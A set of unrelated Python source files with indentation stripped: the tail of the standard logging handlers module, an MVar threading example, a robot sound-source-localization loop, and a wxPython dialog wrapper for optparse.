s = ('%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except Exception:
self.handleError(record)
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer.clear()
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None,
flushOnClose=True):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
The ``flushOnClose`` argument is ``True`` for backward compatibility
reasons - the old behaviour is that when the handler is closed, the
buffer is flushed, even if the flush level hasn't been exceeded nor the
capacity exceeded. To prevent this, set ``flushOnClose`` to ``False``.
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
# See Issue #26559 for why this has been added
self.flushOnClose = flushOnClose
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer.clear()
finally:
self.release()
def close(self):
"""
Flush, if appropriately configured, set the target to None and lose the
buffer.
"""
try:
if self.flushOnClose:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also returns the formatted
# message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info and exc_text attributes, as they are no longer
# needed and, if not None, will typically not be pickleable.
msg = self.format(record)
# bpo-35726: make copy of record to avoid affecting other handlers in the chain.
record = copy.copy(record)
record.message = msg
record.msg = msg
record.args = None
record.exc_info = None
record.exc_text = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
if has_task_done:
q.task_done()
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
|
example.py
|
# Copyright (c) 2018 Gabriele Baldoni.
#
# See the NOTICE file(s) distributed with this work for additional
# information regarding copyright ownership.
#
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# http://www.eclipse.org/legal/epl-2.0, or the Apache License, Version 2.0
# which is available at https://www.apache.org/licenses/LICENSE-2.0.
#
# SPDX-License-Identifier: Apache-2.0
#
# Contributors: Gabriele Baldoni MVar implementation in Python
import time
from threading import Thread
from random import randint
from mvar import MVar
def worker(var):
time.sleep(randint(1, 3))
var.put(1)
def worker2(var):
var.put(3)
print('Starting Worker1 and waiting on MVar the result...')
local_var = MVar()
Thread(target=worker, args=(local_var,), daemon=True).start()
res = local_var.take()
print("Worker1 returned {}".format(res))
print("Putting a value on the MVar to block Worker2")
local_var.put(2)
print('Starting Worker2...')
Thread(target=worker2, args=(local_var,), daemon=True).start()
res2 = local_var.take()
print("Getting previous value stored in MVar to"
"unlock Worker2 - MVar.take() returned {}".format(res2))
res3 = local_var.take()
print("Worker3 returned {}".format(res3))
|
ssl_loop_backup.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
loop thread to run ssl
"""
from SoundSourceLocalization.ssl_setup import *
from SoundSourceLocalization.ssl_gcc_generator import GccGenerator
from SoundSourceLocalization.ssl_actor_critic import Actor, Critic
from SoundSourceLocalization.ssl_map import Map
from SoundSourceLocalization.ssl_audio_processor import *
from SoundSourceLocalization.ssl_turning import SSLturning
from SoundSourceLocalization.kws_detector import KwsDetector
import time
import sys
import os
import threading
import random
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
import Driver.ControlOdometryDriver as CD
class SSL:
def __init__(self):
print(" === init SSL part ")
# self.KWS = KwsDetector(CHUNK, RECORD_DEVICE_NAME, RECORD_WIDTH, CHANNELS,
# SAMPLE_RATE, FORMAT, KWS_WAVE_PATH, KWS_MODEL_PATH, KWS_LABEL_PATH)
def loop(self, event, control, source='test'):
device_index = -1
p = pyaudio.PyAudio()
"""
Recognize Mic device, before loop
"""
# scan to get usb device
print(p.get_device_count())
for index in range(0, p.get_device_count()):
info = p.get_device_info_by_index(index)
device_name = info.get("name")
print("device_name: ", device_name)
# find mic usb device
if device_name.find(RECORD_DEVICE_NAME) != -1:
device_index = index
# break
if device_index != -1:
print("find the device")
print(p.get_device_info_by_index(device_index))
else:
print("don't find the device")
exit()
saved_count = 0
gccGenerator = GccGenerator()
map = Map()
# fixme, set start position
map.walker_pos_x = 1.3
map.walker_pos_z = 3.3
map.walker_face_to = 0
# 1.0, 1.85, 0
# -3.1, 0.9, 90
# -2.1, 0.9, 90
actor = Actor(GCC_BIAS, ACTION_SPACE, lr=0.004)
critic = Critic(GCC_BIAS, ACTION_SPACE, lr=0.003, gamma=0.95)
actor.load_trained_model(MODEL_PATH)
# init at the first step
state_last = None
action_last = None
direction_last = None
DE_NOISE = False
# steps
while True:
event.wait()
print("===== %d =====" % saved_count)
map.print_walker_status()
map.detect_which_region()
final_file = None
"""
Record
"""
# todo, congest here for kws
if saved_count == 0:
print("congest in KWS ...")
self.KWS.slide_win_loop()
wakeup_wav = self.KWS.RANDOM_PREFIX + "win.wav"
denoise_file = str(saved_count) + "_de.wav"
de_noise(os.path.join(self.KWS.WAV_PATH, wakeup_wav), os.path.join(self.KWS.WAV_PATH, denoise_file))
if DE_NOISE is False:
final_file = wakeup_wav
else:
final_file = denoise_file
else:
# active detection
print("start monitoring ... ")
while True:
event.wait()
# print("start monitoring2 ... ")
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(RECORD_WIDTH),
channels=CHANNELS,
rate=SAMPLE_RATE,
input=True,
input_device_index=device_index)
# 16 data
frames = []
for i in range(0, int(SAMPLE_RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
# print("here")
frames.append(data)
# print(len(frames))
stream.stop_stream()
stream.close()
p.terminate()
# print("End monitoring ... ")
# temp store into file
wave_output_filename = str(saved_count) + ".wav"
wf = wave.open(os.path.join(WAV_PATH, wave_output_filename), 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(RECORD_WIDTH)
wf.setframerate(SAMPLE_RATE)
wf.writeframes(b''.join(frames))
wf.close()
# todo, de-noise into new file, then VAD and split
noise_file = wave_output_filename
denoise_file = str(saved_count) + "_de.wav"
de_noise(os.path.join(WAV_PATH, noise_file), os.path.join(WAV_PATH, denoise_file))
# if exceed, break, split to process, then action. After action done, begin monitor
if DE_NOISE is False:
final_file = noise_file
else:
final_file = denoise_file
if judge_active(os.path.join(WAV_PATH, final_file)) is True:
print("Detected ... ")
break
"""
Split
"""
if saved_count == 0:
split_channels(os.path.join(self.KWS.WAV_PATH, final_file))
else:
split_channels(os.path.join(WAV_PATH, final_file))
"""
use four mic file to be input to produce action
"""
print("producing action ...")
# fixme, change debug model if mic change
if saved_count == 0:
gcc = gccGenerator.cal_gcc_online(self.KWS.WAV_PATH, saved_count, type='Bias', debug=False, denoise=DE_NOISE, special_wav=final_file)
else:
gcc = gccGenerator.cal_gcc_online(WAV_PATH, saved_count, type='Bias', debug=False, denoise=DE_NOISE)
state = np.array(gcc)[np.newaxis, :]
print("GCC Bias :", gcc)
# todo, define invalids, based on constructed map % restrict regions
invalids_dire = map.detect_invalid_directions()
print("invalids_dire of walker: ", invalids_dire)
# transform walker direction to mic direction
invalids_idx = [(i + 45) % 360 / 45 for i in invalids_dire]
print("invalids_idx of mic: ", invalids_idx)
# set invalids_idx in real test
action, _ = actor.output_action(state, invalids_idx)
print("prob of mic: ", _)
# transform mic direction to walker direction
direction = (action + 6) % 7 * 45
# bias is 45 degree, ok
print("Estimated direction of walker : ", direction)
# fixme, for test or hard code, cover direction
# direction = int(input())
print("Applied direction of walker :", direction)
# todo, set different rewards and learn
if saved_count > 0:
reward = None
if source == '0':
max_angle = max(float(direction), float(direction_last))
min_angle = min(float(direction), float(direction_last))
diff = min(abs(max_angle - min_angle), 360 - max_angle + min_angle)
reward = 1 - diff / 180
print("single room 's reward is :" + str(reward))
# td = critic.learn(state_last, reward, state)
# actor.learn(state_last, action_last, td)
elif source == '1':
reward = 1 - map.cal_distance_region(1) / 9
print("src 1 's reward is :", reward)
td = critic.learn(state_last, reward, state)
actor.learn(state_last, action_last, td)
elif source == '4':
reward = 1 - map.cal_distance_region(4) / 3
print("src 4 's reward is :", reward)
td = critic.learn(state_last, reward, state)
actor.learn(state_last, action_last, td)
state_last = state
direction_last = direction
# transfer given direction into action index, based on taken direction
action_last = (direction + 45) % 360 / 45
print("apply movement ...")
SSLturning(control, direction)
control.speed = STEP_SIZE / FORWARD_SECONDS
control.radius = 0
control.omega = 0
time.sleep(FORWARD_SECONDS)
control.speed = 0
print("movement done.")
map.update_walker_pos(direction)
saved_count += 1
# save online model if reach the source, re-chose actor model path if needed
if source == "0":
if 3 <= map.walker_pos_x <= 3.2 and 6.5 <= map.walker_pos_z <= 7.5:
actor.saver.save(actor.sess, ONLINE_MODEL_PATH)
elif source == "1":
if 3.5 <= map.walker_pos_x and map.walker_pos_z >= 6:
actor.saver.save(actor.sess, ONLINE_MODEL_PATH)
if __name__ == '__main__':
ssl = SSL()
cd = CD.ControlDriver()
temp = threading.Event()
temp.set()
p2 = threading.Thread(target=cd.control_part, args=())
p1 = threading.Thread(target=ssl.loop, args=(temp,cd,))
p2.start()
p1.start()
|
needswx.py
|
import sys, os, os.path, fnmatch, types, threading, time
import re, copy, StringIO, csv, math, pickle
from optparse_gui import OptionParser, UserCancelledError, Progress
import optparse
from ConfigParser import ConfigParser
import wx
from wx.lib.filebrowsebutton import FileBrowseButton
def quotedifnec(f):
if ' ' in f:
return '"%s"'%f
return f
def quotedlistifnec(lf):
retval = []
for f in lf:
retval.append(quotedifnec(f))
return " ".join(retval)
class MyFileBrowseButton( FileBrowseButton ):
def __init__(self,*args,**kw):
if 'dotfile' in kw:
self.dotfile = kw['dotfile']
del kw['dotfile']
if 'key' in kw:
self.key = kw['key']
del kw['key']
self.isdir = False
if 'isdir' in kw:
self.isdir = kw['isdir']
del kw['isdir']
super(MyFileBrowseButton,self).__init__(*args,**kw)
def createDialog( self, parent, id, pos, size, style, name="" ):
"""Setup the graphic representation of the dialog"""
wx.Panel.__init__ (self, parent, id, pos, size, style, name )
self.SetMinSize(size) # play nice with sizers
box = wx.BoxSizer(wx.HORIZONTAL)
# self.label = self.createLabel( )
# box.Add( self.label, 0, wx.CENTER )
self.textControl = self.createTextControl()
box.Add( self.textControl, 1, wx.CENTER, 5)
self.browseButton = self.createBrowseButton()
box.Add( self.browseButton, 0, wx.LEFT|wx.CENTER, 5)
self.SetAutoLayout(True)
self.SetSizer( box )
self.Layout()
if type( size ) == types.TupleType:
size = apply( wx.Size, size)
self.SetDimensions(-1, -1, size.width, size.height, wx.SIZE_USE_EXISTING)
def OnBrowse (self, event = None):
""" Going to browse for file... """
current = self.GetValue()
s = StringIO.StringIO(current)
rr = csv.reader(s,delimiter=' ',quotechar='"',quoting=csv.QUOTE_MINIMAL)
try:
row = rr.next()
except StopIteration:
row = []
if len(row) > 0 and os.path.exists(row[0]):
directory,current = os.path.split(row[0])
if len(row) > 1:
current = []
for r in row:
current.append(os.path.split(r)[1])
current = ' '.join(map(quotedifnec,current))
current = ""
elif hasattr(self,'dotfile') and self.dotfile:
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if config.has_section("LastFolder") and config.has_option("LastFolder",self.key):
directory = config.get("LastFolder",self.key)
else:
directory = self.startDirectory
current = ""
else:
directory = self.startDirectory
current = ""
if self.isdir:
dlg = wx.DirDialog(self, self.dialogTitle, directory,
self.fileMode)
else:
dlg = wx.FileDialog(self, self.dialogTitle, directory, current,
self.fileMask, self.fileMode)
if dlg.ShowModal() == wx.ID_OK:
s = StringIO.StringIO()
wr = csv.writer(s,delimiter=' ',quotechar='"',quoting=csv.QUOTE_MINIMAL)
if self.fileMode&wx.MULTIPLE:
wr.writerow(dlg.GetPaths())
dir = os.path.split(dlg.GetPaths()[0])[0]
else:
wr.writerow([dlg.GetPath()])
dir = os.path.split(dlg.GetPath())[0]
self.SetValue(s.getvalue().strip())
s.close()
if hasattr(self,'dotfile') and self.dotfile:
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if not config.has_section("LastFolder"):
config.add_section("LastFolder")
config.set("LastFolder",self.key,dir)
try:
wh = open(self.dotfile,'wb')
config.write(wh)
wh.close()
except IOError:
pass
dlg.Destroy()
class OptparseDialog( wx.Dialog ):
'''The dialog presented to the user with dynamically generated controls,
to fill in the required options.
Based on the wx.Dialog sample from wx Docs & Demos'''
def __init__(
self,
option_parser, #The OptionParser object
parent = None,
ID = 0,
title = 'Program Options',
pos=wx.DefaultPosition,
size=wx.DefaultSize,
style=wx.DEFAULT_DIALOG_STYLE,
name = 'OptparseDialog',
values = None,
args = False
):
self.option_parser = option_parser
if values == None:
values = option_parser.get_defaults()
provider = wx.SimpleHelpProvider()
wx.HelpProvider_Set(provider)
pre = wx.PreDialog()
pre.SetExtraStyle(wx.DIALOG_EX_CONTEXTHELP)
pre.Create(parent, ID, title, pos, size, style)
self.PostCreate(pre)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer2 = wx.BoxSizer(wx.HORIZONTAL)
top_label_text = '%s %s' % ( "".join(option_parser.get_prog_name().split("\\")).split(".")[0],
option_parser.get_version() )
label = wx.StaticText(self, -1, top_label_text)
sizer2.Add(label, 0, wx.GROW|wx.ALIGN_LEFT|wx.ALL, 5)
if wx.Platform != "__WXMSW__":
sizer2.AddStretchSpacer(-1)
btn = wx.ContextHelpButton(self)
sizer2.Add(btn, 0, wx.ALIGN_RIGHT|wx.ALL)
sizer.Add(sizer2,0, wx.GROW|wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
line = wx.StaticLine(self, -1, size=(20,-1), style=wx.LI_HORIZONTAL)
sizer.Add(line, 0, wx.GROW|wx.ALIGN_CENTER_VERTICAL|wx.RIGHT|wx.TOP|wx.LEFT, 5)
nb = wx.Notebook(self, wx.ID_ANY)
self.option_controls = {}
self.option_controls.update(self.set_panel(nb,option_parser.option_list,values,'Options'))
for g in option_parser.option_groups:
self.option_controls.update(self.set_panel(nb,g.option_list,values,g.title))
if args:
self.args_ctrl = self.set_args_panel(nb,values,'Arguments')
else:
self.args_ctrl = None
sizer.Add(nb, 0, wx.GROW|wx.ALIGN_CENTER_VERTICAL|wx.RIGHT|wx.TOP|wx.LEFT, 5)
line = wx.StaticLine(self, -1, size=(20,-1), style=wx.LI_HORIZONTAL)
sizer.Add(line, 0, wx.GROW|wx.ALIGN_CENTER_VERTICAL|wx.RIGHT|wx.TOP|wx.LEFT, 5)
btnsizer = wx.BoxSizer(wx.HORIZONTAL)
btn = wx.Button(self, wx.ID_CANCEL)
# btn.SetHelpText("The OK button completes the dialog")
btnsizer.Add(btn,0,wx.ALL,5)
btnsizer.AddSpacer((100,-1))
btn = wx.Button(self, wx.ID_CLEAR, label="Reset")
btn.Bind(wx.EVT_BUTTON, self.closeDialog)
btnsizer.Add(btn,0,wx.ALL,5)
btnsizer.AddSpacer((100,-1))
btn = wx.Button(self, wx.ID_OK)
btn.SetDefault()
# btn.SetHelpText("The Cancel button cancels the dialog.")
btnsizer.Add(btn,0,wx.ALL,5)
sizer.Add(btnsizer, 0, wx.ALIGN_CENTER,wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
self.SetSizer(sizer)
sizer.Fit(self)
def closeDialog(self,event):
self.state = 'Reset'
self.Close()
def set_panel(self,parent,opts,values,title):
nopt = len(opts)
s = wx.FlexGridSizer(nopt,2)
p = wx.Panel(parent, -1)
parent.AddPage(p,title)
p.SetSizer(s)
return self.add_opts(opts,values,p,s)
def set_args_panel(self,parent,values,title):
s = wx.FlexGridSizer(1,2)
p = wx.Panel(parent, -1)
parent.AddPage(p,title)
p.SetSizer(s)
label = wx.StaticText(p, -1, 'Arguments' )
label.SetHelpText( 'Free-form arguments.' )
ctrl = wx.TextCtrl( p, -1, '', size = ( 300, 100 ),
style=wx.TE_MULTILINE | wx.TE_PROCESS_ENTER )
ctrl.SetHelpText(
'''Args can either be separated by a space or a newline
Args that contain spaces must be entered like so: "arg with sapce"
'''
)
ctrl.Value = values['-args-']
s.Add( label, 0, wx.ALIGN_RIGHT | wx.ALL, 5 )
s.Add( ctrl, 1, wx.ALIGN_LEFT | wx.ALL, 5 )
return ctrl
def add_opts(self,opts,values,parent,sizer):
controls = {}
for option in opts:
if option.dest is None:
continue
if option.help is None:
option.help = u''
if option.name is None:
option.name = option.dest.title()
label = wx.StaticText(parent, -1, option.name )
label.SetHelpText( option.help )
sizer.Add( label, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT|wx.ALL, 5 )
if 'file' == option.type:
if not option.filetypes:
fileMask = 'All Files|*.*'
else:
fileMask = '|'.join([ "%s (%s)|%s"%(nm,ft,ft) for nm,ft in option.filetypes])
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.OPEN|wx.FILE_MUST_EXIST,
fileMask=fileMask,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'files' == option.type:
if not option.filetypes:
fileMask = 'All Files|*.*'
else:
fileMask = '|'.join([ "%s (%s)|%s"%(nm,ft,ft) for nm,ft in option.filetypes])
if isinstance(values.get(option.dest,""),basestring):
initStr = values.get(option.dest,"")
else:
initStr = str(' '.join(v if ' ' not in v else '"%s"'%v for v in values.get(option.dest,[])))
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.OPEN|wx.MULTIPLE|wx.FILE_MUST_EXIST,
fileMask=fileMask,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,
initialValue=initStr)
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'savefile' == option.type:
if not option.filetypes:
fileMask = 'All Files|*.*'
else:
fileMask = '|'.join([ "%s (%s)|%s"%(nm,ft,ft) for nm,ft in option.filetypes])
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.SAVE|wx.OVERWRITE_PROMPT,
fileMask=fileMask,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'savedir' == option.type:
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.DD_DEFAULT_STYLE,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,isdir=True,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'dir' == option.type:
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.DD_DEFAULT_STYLE|wx.DD_DIR_MUST_EXIST,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,isdir=True,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'store' == option.action:
if 'choice' == option.type:
if optparse.NO_DEFAULT == option.default:
option.default = option.choices[0]
ctrl = wx.ComboBox(
parent, -1, choices = option.choices,
style = wx.CB_DROPDOWN | wx.CB_READONLY,
size=(300,-1)
)
try:
ind = option.choices.index(values.get(option.dest,None))
except (ValueError,KeyError):
ind = 0
ctrl.Select(ind)
elif 'multichoice' == option.type:
if sys.platform == 'win32':
perentry = 13
pergap = 0
top = 5
bottom = 0
ysize = min(len(option.multichoices),5)*perentry + \
(min(len(option.multichoices),5)-1)*pergap + top + bottom
else:
perentry = 22
pergap = 3
ysize = min(len(option.multichoices),5)*perentry + \
(min(len(option.multichoices),5)+1)*pergap
ctrl = wx.ListBox(
parent, -1, choices = option.multichoices,
style = wx.LB_EXTENDED | \
wx.LB_HSCROLL | wx.LB_NEEDED_SB,
size = (300,ysize)
)
# print >>sys.stderr, values.get(option.dest),option.multichoices
selected = values.get(option.dest,[])
if isinstance(selected,basestring):
selected = selected.split(',')
for val in selected:
try:
ind = option.multichoices.index(val)
# print >>sys.stderr, val, ind
ctrl.Select(ind)
except ValueError:
continue
else:
if option.text:
ctrl = wx.TextCtrl( parent, -1, "", size = ( 300, 100 ),
style=wx.TE_MULTILINE | wx.TE_PROCESS_ENTER )
elif option.type == 'password':
ctrl = wx.TextCtrl( parent, -1, "", size=(300,-1),
style=wx.TE_PASSWORD )
else:
ctrl = wx.TextCtrl( parent, -1, "", size=(300,-1) )
if option.dest in values:
ctrl.Value = str( values[option.dest] )
sizer.Add( ctrl, 0, wx.ALIGN_LEFT|wx.ALL, 5 )
elif option.action in ( 'store_true', 'store_false' ):
ctrl = wx.CheckBox( parent, -1, "", size = ( 300, -1 ) )
if option.dest in values:
ctrl.Value = values[option.dest]
sizer.Add( ctrl, 0, wx.ALIGN_LEFT|wx.ALL, 5 )
ctrl.SetHelpText( option.help )
controls[ option ] = ctrl
return controls
def _getOptions( self ):
option_values = {}
for option, ctrl in self.option_controls.iteritems():
if option.type == 'multichoice':
option_values[option] = ','.join(map(lambda i: option.multichoices[i],ctrl.GetSelections()))
else:
option_values[option] = ctrl.GetValue()
return option_values
def _getArgs( self ):
if self.args_ctrl == None:
return []
args_buff = self.args_ctrl.Value
args = re.findall( r'(?:((?:(?:\w|\d)+)|".*?"))\s*', args_buff )
return args
def getOptionsAndArgs( self ):
'''Returns the tuple ( options, args )
options - a dictionary of option names and values
args - a sequence of args'''
option_values = self._getOptions()
args = self._getArgs()
return option_values, args
class EmptyNotNoneOptionError (optparse.OptionError):
"""
Raised if a notNone option has no value.
"""
class UserCheckOptionError (optparse.OptionError):
"""
Raised if a user supplied values check fails.
"""
class OptionParserGUI( OptionParser ):
def __init__( self, *args, **kwargs ):
if wx.GetApp() is None:
self.app = wx.App( False )
self.args = False
if kwargs.has_key('args'):
self.args = kwargs['args']
del kwargs['args']
dotfile = None
if 'dotfile' in kwargs:
dotfile = kwargs['dotfile']
del kwargs['dotfile']
OptionParser.__init__( self, *args, **kwargs )
self.dotfile = self.find_dotfile(dotfile)
def find_dotfile(self,base=None):
if not base:
base = self.get_prog_name()
#print base
if 'HOMEPATH' in os.environ and 'HOMEDRIVE' in os.environ:
home = os.environ['HOMEDRIVE'] + os.environ['HOMEPATH']
elif 'HOME' in os.environ:
home = os.environ['HOME']
else:
raise RuntimeError("Can't find home directory!")
if base.endswith('.exe'):
dotfile = base[:-4]+'.ini'
elif base.endswith('.py'):
dotfile = base[:-3]+'.ini'
else:
dotfile = base+'.ini'
return os.path.join(home,"."+dotfile)
def parse_args( self, args = None, values = None, opts = None ):
'''
This is the heart of it all - overrides optparse.OptionParser.parse_args
@param arg is irrelevant and thus ignored,
it\'s here only for interface compatibility
'''
if opts != None:
initvals = {}
for g,o in self.iteropts():
# print repr(g),repr(o),o.dest
if o.dest and hasattr(opts,o.dest):
initvals[o.dest] = getattr(opts,o.dest)
set_values = initvals
else:
set_values = None
if opts == None:
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if not config.has_section("VERSION") or config.get("VERSION","VERSION") != self.version:
os.unlink(self.dotfile)
config=ConfigParser()
if config.has_section("LastValue"):
for g,o in self.iteropts():
if o.dest and o.remember and config.has_option("LastValue",o.dest):
if set_values == None:
set_values = {}
value = pickle.loads(config.get("LastValue",o.dest))
if o.type == 'multichoice':
set_values[o.dest] = value.split(',')
elif o.type in ('savefile','savedir','file'):
set_values[o.dest] = quotedifnec(value)
elif o.type in ('files',):
set_values[o.dest] = quotedlistifnec(value)
else:
set_values[o.dest] = value
good = False
while not good:
good = True
dlg = OptparseDialog( option_parser = self, values = set_values, args = self.args )
dlg.state = None
dlg_result = dlg.ShowModal()
if dlg_result == wx.ID_CANCEL and dlg.state == None:
raise UserCancelledError( 'User has canceled' )
if dlg_result == wx.ID_CANCEL and dlg.state == 'Reset':
good = False
if os.path.exists(self.dotfile):
os.unlink(self.dotfile)
set_values = None
continue
assert dlg_result == wx.ID_OK
if values is None:
values = self.get_default_values()
option_values, args = dlg.getOptionsAndArgs()
set_values = {'-args-':''}
for option, value in option_values.iteritems():
set_values[option.dest] = value
if dlg.args_ctrl:
set_values['-args-'] = dlg.args_ctrl.Value
optmap = {}
for option in self.option_list:
optmap[str(option)] = option
for gr in self.option_groups:
for option in gr.option_list:
optmap[str(option)] = option
for option, value in option_values.iteritems():
if option.action in ('store_true','store_false'):
setattr( values, option.dest, value )
continue
if option.takes_value() is False:
value = None
if isinstance(value,unicode):
value = str(value)
if option.notNone and (value == None or value == ''):
self.error("%s: notNone option is empty"%(option,),
option,exit=False)
good = False
break
try:
option.process( option, value, values, self )
except optparse.OptionValueError, e:
self.error(e.msg,option,exit=False)
good = False
break
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if not config.has_section("LastValue"):
config.add_section("LastValue")
if not config.has_section("VERSION"):
config.add_section("VERSION")
config.set("VERSION","VERSION",self.version)
for g,o in self.iteropts():
if o.remember:
if getattr(values,o.dest) not in (None,""):
config.set("LastValue",o.dest,pickle.dumps((getattr(values,o.dest))))
else:
config.remove_option("LastValue",o.dest)
try:
wh = open(self.dotfile,'wb')
config.write(wh)
wh.close()
except IOError:
pass
return values, args
def error( self, msg, option=None, exit=True):
msg = re.sub(r"u'","'",msg)
if ':' in msg:
msg = msg.split(':',1)[1].strip()
if option:
msg = option.name+": "+msg
dlg = wx.MessageDialog( None, msg, 'Error!', wx.ICON_ERROR )
dlg.ShowModal()
if exit:
sys.exit(2)
return
